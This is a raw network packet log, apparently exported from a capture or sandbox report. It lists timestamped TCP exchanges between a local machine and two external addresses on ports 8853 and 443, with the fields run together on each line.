                                                                                                                                                                    Dec 30, 2024 04:59:02.771951914 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.772134066 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772213936 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772224903 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772236109 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772248030 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772258043 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.772279024 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.772926092 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772937059 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772948027 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772958040 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772964001 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.772969961 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772980928 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.772989988 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.773036957 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.773772955 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.773785114 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.773794889 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.773813009 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.773837090 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.855340004 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.968755960 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.983990908 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984004021 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984014034 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984021902 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984033108 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984041929 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984051943 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984077930 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.984205008 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984242916 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984245062 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.984251976 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984261036 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984272003 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.984304905 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.984647989 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984658957 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984669924 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984675884 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984687090 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.984714985 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.984735012 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.985109091 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985121012 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985131979 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985142946 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985155106 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985158920 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.985220909 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.985703945 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985713959 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985724926 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985733986 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985744953 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985744953 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.985759020 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985770941 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985779047 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.985780001 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985790968 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.985806942 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.985835075 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.986661911 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986671925 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986681938 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986691952 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986701965 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986711979 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986721039 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.986723900 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986733913 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986745119 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.986769915 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.987603903 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.987613916 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.987624884 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.987634897 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.987646103 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.987653971 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:02.987656116 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:02.987695932 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:03.196496964 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.196685076 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.196865082 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:03.196865082 CET497318853192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 04:59:03.201817989 CET885349731118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.228179932 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.228252888 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:03.229247093 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.229295015 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:03.627048016 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:03.627084017 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.627383947 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.627446890 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:03.633328915 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:03.675355911 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.999452114 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.999469995 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.999483109 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.999557018 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:03.999603033 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:03.999650955 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.077918053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.077934980 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.077984095 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.078005075 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.078025103 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.078046083 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.080889940 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.080904007 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.080949068 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.080959082 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.080988884 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.080998898 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.160907030 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.160924911 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.160976887 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.160991907 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.161031961 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.161045074 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.162204981 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.162219048 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.162281036 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.162281036 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.162290096 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.162333012 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.163887978 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.163914919 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.163955927 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.163964987 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.163979053 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.164004087 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.166318893 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.166337967 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.166379929 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.166388988 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.166407108 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.166798115 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.244359970 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.244376898 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.244442940 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.244453907 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.244503975 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.245069981 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.245086908 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.245126963 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.245135069 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.245183945 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.253777981 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.253796101 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.253865004 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.253874063 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.253914118 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.259928942 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.259944916 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.260014057 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.260024071 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.260699034 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.265136003 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.265151024 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.265223026 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.265233040 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.266215086 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.272480011 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.272495031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.272557020 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.272566080 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.273228884 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.278551102 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.278573036 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.278626919 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.278640985 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.278671026 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.278681993 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.328049898 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.328066111 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.328134060 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.328149080 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.328474045 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.328634024 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.328649998 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.328681946 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.328690052 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.328705072 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.328723907 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.329277039 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.329292059 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.329320908 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.329328060 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.329355001 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.329374075 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.337239981 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.337255955 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.337305069 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.337315083 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.337327003 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.337349892 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.343550920 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.343574047 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.343636036 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.343648911 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.343663931 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.343687057 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.467174053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.467196941 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.467232943 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.467248917 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.467273951 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.467294931 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.468398094 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.468415976 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.468451977 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.468458891 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.468487024 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.468497992 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.474843979 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.474858999 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.474895954 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.474904060 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.474941015 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.481786966 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.481801987 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.481848001 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.481857061 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.481877089 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.481893063 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.487792015 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.487807989 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.487857103 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.487864971 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.487905025 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.493706942 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.493722916 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.493762016 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.493776083 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.493803024 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.493815899 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.495861053 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.495877028 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.495933056 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.495942116 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.495970964 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.495985985 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.497704983 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.497720003 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.497756958 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.497764111 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.497792006 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.497807026 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.550678968 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.550695896 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.550750017 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.550760031 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.550789118 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.550808907 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.551856995 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.551873922 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.551917076 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.551925898 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.551948071 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.551969051 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.557621956 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.557640076 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.557679892 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.557687998 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.557718039 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.557734013 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.563637972 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.563653946 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.563704967 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.563713074 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.563747883 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.563764095 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.569245100 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.569261074 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.569307089 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.569314957 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.569339991 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.569360018 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.575908899 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.575931072 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.575973034 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.575980902 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.576016903 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.576026917 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.580298901 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.580321074 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.580387115 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.580394983 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.580440044 CET49732443192.168.2.447.79.48.211
                                                                                                                                                                    Dec 30, 2024 04:59:04.582182884 CET4434973247.79.48.211192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:04.582201004 CET4434973247.79.48.211192.168.2.4
